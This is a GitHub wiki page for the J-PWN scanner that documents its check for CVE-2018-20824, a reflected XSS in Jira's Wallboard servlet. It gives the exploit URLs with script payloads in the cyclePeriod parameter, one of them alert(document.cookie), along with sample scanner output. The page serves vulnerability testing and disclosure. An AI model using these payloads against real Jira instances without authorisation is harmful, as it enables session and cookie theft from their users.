CVE‐2018‐20824 - carnal0wnage/J-PWN GitHub Wiki

CVE-2018-20824

Category: [XSS]

module name: check_cve_2018_20824

url: plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert("XSS12345")

INFO: Checking for CVE-2018-20824 (XSS)
[Testing URL]: http://JIRA/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert("XSS12345")
[+] [XSS] Vulnerable to CVE-2018-20824: http://JIRA/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert("XSS12345")
[+] URL: http://JIRA/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.cookie)

CVE-2018-20824-XSS

Reference: https://jira.atlassian.com/browse/JRASERVER-69238

Description

The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.